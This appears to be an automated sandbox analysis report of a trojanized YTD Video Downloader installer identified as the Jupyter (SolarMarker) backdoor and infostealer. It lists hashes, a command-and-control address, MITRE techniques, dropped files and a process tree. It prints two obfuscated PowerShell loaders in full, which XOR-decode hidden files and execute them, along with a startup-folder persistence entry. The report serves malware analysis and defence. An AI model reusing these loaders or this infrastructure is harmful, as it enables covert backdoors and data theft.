jupyter | 7462809739b96455ae2f24a3a0089574147185ae67d602d42db2314bdeb101b7

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-10-2024 23:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.exe
Size

121.8MB
MD5

f456565c272ac8ad9d0751b76cc026bc
SHA1

d2f80b5f1d5756e890a89cca5532dabe8e466d11
SHA256

00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9
SHA512

a890eb73154f7c292f5b608646b5303f098423b1c3476f062b71accce0dbde9f41ab170cadfd26912d747524b5dede68d9b81c4eb5147571748a40a9033dc3bc
SSDEEP

393216:4ezBr1SCF0LIUYuFBmY54NEZPb+ON8BM+:4kBrxM5YuF4jNePbH2M+

Score

10^/10

jupyter backdoor discovery execution stealer trojan

Malware Config

Extracted

Family

jupyter

Version

IL-4

http://185.244.213.64

Signatures

Jupyter Backdoor/Client payload 1 IoCs

resource	yara_rule
behavioral2/memory/2716-399-0x00000000078D0000-0x00000000078E2000-memory.dmp	family_jupyter

Jupyter family
jupyter
Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter

Blocklisted process makes network request 3 IoCs

flow	pid	Process
126	2716	powershell.exe
138	2716	powershell.exe
156	2716	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\MICRosOFT\wInDoWS\START MEnu\prOGraMS\sTArTUp\aea2278bb48424bb7f56e1d4e854e.LNK	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
1004	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp
2356	YTDSetup.exe
2356	ytd.exe

Loads dropped DLL 34 IoCs

pid	Process
1004	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp
1004	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe
2356	ytd.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2716	powershell.exe

Drops file in Program Files directory 55 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\librtmp.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1059.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1060.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1050.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.Apachev2	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1025.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1033.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1034.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1040.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1030.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1031.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1044.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1051.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1061.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv3	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2052.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1036.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1053.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\manual.bat	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv2	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1055.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1038.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1048.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2074.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res9999.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\plugins.dat.2356	ytd.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1026.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\LICENSE	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1049.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1045.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1052.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Uninstall.exe	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1043.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\FFMPEG.EXE	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1029.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1032.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1035.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2070.ini	YTDSetup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ytd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YTDSetup.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\zjrdovxwlxcysgd\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\zjrdovxwlxcysgd	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\zjrdovxwlxcysgd\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\zjrdovxwlxcysgd\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\zjrdovxwlxcysgd\shell\open\command\ = "poWERsHEll -winDoWSTYle hidDen -eP byPASs -cOmmaND \"$a85386bf0894bb8b4f242d86f786b='XjBKPypeUn1rRz4kI0VmbTVgfE9obU1AYHY4Yi1gd1lgYilyajMqSHVCZkgrdThWOzRnb0NnMWlta1R0bn57c35sQ19OU2pmJClCeHshX1dnMXhIcXh0KV5wZlRwUEB+Tnw+XnAyUmNeU2l1O0BTbSV1Xk5GbXleTldwPEBSQCsyXlA5MjFeTWswTEB9e3QoQHc9ejlAeyptU15QaVRUQHteOTZebnNxUF5NciQo';$a680ba7ee83479b5da79f4a1a53b6=[SySTEm.iO.FiLE]::reADalLbyTEs('C:\\Users\\Admin\\AppData\\Roaming\\MIcRoSoft\\jQPaecfIRokSDHv\\qisDkbZGORBmnXWYN.nqsegmfFBxlJ');FOR($a735b45222449abaf5e32a65c7826=0;$a735b45222449abaf5e32a65c7826 -Lt $a680ba7ee83479b5da79f4a1a53b6.cOuNt;){fOR($a13ff45f9e040199771025ecfd4cf=0;$a13ff45f9e040199771025ecfd4cf -lt $a85386bf0894bb8b4f242d86f786b.LENGtH;$a13ff45f9e040199771025ecfd4cf++){$a680ba7ee83479b5da79f4a1a53b6[$a735b45222449abaf5e32a65c7826]=$a680ba7ee83479b5da79f4a1a53b6[$a735b45222449abaf5e32a65c7826] -bXOr $a85386bf0894bb8b4f242d86f786b[$a13ff45f9e040199771025ecfd4cf];$a735b45222449abaf5e32a65c7826++;iF($a735b45222449abaf5e32a65c7826 -ge $a680ba7ee83479b5da79f4a1a53b6.count){$a13ff45f9e040199771025ecfd4cf=$a85386bf0894bb8b4f242d86f786b.leNgtH}}};[SyStEM.REFLecTIon.AsSemblY]::LOad($a680ba7ee83479b5da79f4a1a53b6);[mArS.deImos]::iNteraCT()\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.mgojycysqunxlrkvv	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\.mgojycysqunxlrkvv\ = "zjrdovxwlxcysgd"	powershell.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2356	YTDSetup.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
1652	msedge.exe
1652	msedge.exe
1480	msedge.exe
1480	msedge.exe
5200	identity_helper.exe
5200	identity_helper.exe
4324	msedge.exe
4324	msedge.exe
4324	msedge.exe
4324	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2716	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
2356	ytd.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
1480	msedge.exe
2356	ytd.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2356	ytd.exe
2356	ytd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2232 wrote to memory of 1004	2232	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.exe	87
PID 2232 wrote to memory of 1004	2232	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.exe	87
PID 2232 wrote to memory of 1004	2232	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.exe	87
PID 1004 wrote to memory of 2356	1004	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp	90
PID 1004 wrote to memory of 2356	1004	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp	90
PID 1004 wrote to memory of 2356	1004	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp	90
PID 1004 wrote to memory of 2716	1004	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp	96
PID 1004 wrote to memory of 2716	1004	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp	96
PID 1004 wrote to memory of 2716	1004	00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp	96
PID 2356 wrote to memory of 5088	2356	YTDSetup.exe	102
PID 2356 wrote to memory of 5088	2356	YTDSetup.exe	102
PID 1128 wrote to memory of 1480	1128	explorer.exe	104
PID 1128 wrote to memory of 1480	1128	explorer.exe	104
PID 1480 wrote to memory of 4964	1480	msedge.exe	107
PID 1480 wrote to memory of 4964	1480	msedge.exe	107
PID 2356 wrote to memory of 3820	2356	YTDSetup.exe	108
PID 2356 wrote to memory of 3820	2356	YTDSetup.exe	108
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 5012	1480	msedge.exe	110
PID 1480 wrote to memory of 1652	1480	msedge.exe	111
PID 1480 wrote to memory of 1652	1480	msedge.exe	111
PID 1480 wrote to memory of 1964	1480	msedge.exe	112
PID 1480 wrote to memory of 1964	1480	msedge.exe	112
PID 1480 wrote to memory of 1964	1480	msedge.exe	112
PID 1480 wrote to memory of 1964	1480	msedge.exe	112
PID 1480 wrote to memory of 1964	1480	msedge.exe	112

C:\Users\Admin\AppData\Local\Temp\00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.exe
"C:\Users\Admin\AppData\Local\Temp\00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Users\Admin\AppData\Local\Temp\is-8G1QS.tmp\00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-8G1QS.tmp\00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp" /SL5="$E003C,126715381,999936,C:\Users\Admin\AppData\Local\Temp\00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1004
- - C:\Users\Admin\AppData\Local\Temp\is-CHBQA.tmp\YTDSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\is-CHBQA.tmp\YTDSetup.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" "http://www.ytddownloader.com/thankyou.html?isn=FEB0AD16677D4675A14C6512C8A782E3&lang=1033&cid=f6806fb9c9a4106f0f62648f9d71ef16&oldVer=&newVer=5.9.18&kt=ytdd&pv=0"
      4⤵
      PID:5088
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" "C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"
      4⤵
      PID:3820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$3fba2018e6a4ad0b2eb6aa184bdb7e13='C:\Users\Admin\9b54547bfb7c7280152b9770256db825\98aa00cf6d8c2f1cd36953ee0a6be9fc\98fed0c17d34c7ba82f1d4f6baa20301\6c9fe5f0c1557fb15be5eff57688c5c0\728f38e1cbe4919f666a439e00383f9c\ea5d05ccc9e7d731a8c76d3fcea7c33e\ae1aa033696c45cbe7a707a682bd157d';$3ecdd67481eec4ed1dbeda5b0c531db2='dcVhQWzEeipJLtOoRbDCBusGIrMfNSAvanZqTyKHklXFwYPjmxUg';$cd01f65657f60b643686532361b2eb40=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($3fba2018e6a4ad0b2eb6aa184bdb7e13));remove-item $3fba2018e6a4ad0b2eb6aa184bdb7e13;for($i=0;$i -lt $cd01f65657f60b643686532361b2eb40.count;){for($j=0;$j -lt $3ecdd67481eec4ed1dbeda5b0c531db2.length;$j++){$cd01f65657f60b643686532361b2eb40[$i]=$cd01f65657f60b643686532361b2eb40[$i] -bxor $3ecdd67481eec4ed1dbeda5b0c531db2[$j];$i++;if($i -ge $cd01f65657f60b643686532361b2eb40.count){$j=$3ecdd67481eec4ed1dbeda5b0c531db2.length}}};$cd01f65657f60b643686532361b2eb40=[System.Text.Encoding]::UTF8.GetString($cd01f65657f60b643686532361b2eb40);iex $cd01f65657f60b643686532361b2eb40;"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2716

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:1128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ytddownloader.com/thankyou.html?isn=FEB0AD16677D4675A14C6512C8A782E3&lang=1033&cid=f6806fb9c9a4106f0f62648f9d71ef16&oldVer=&newVer=5.9.18&kt=ytdd&pv=0
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcbad846f8,0x7ffcbad84708,0x7ffcbad84718
    3⤵
    PID:4964
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
    3⤵
    PID:5012
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1652
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
    3⤵
    PID:1964
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
    3⤵
    PID:940
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
    3⤵
    PID:448
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
    3⤵
    PID:4648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
    3⤵
    PID:2908
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
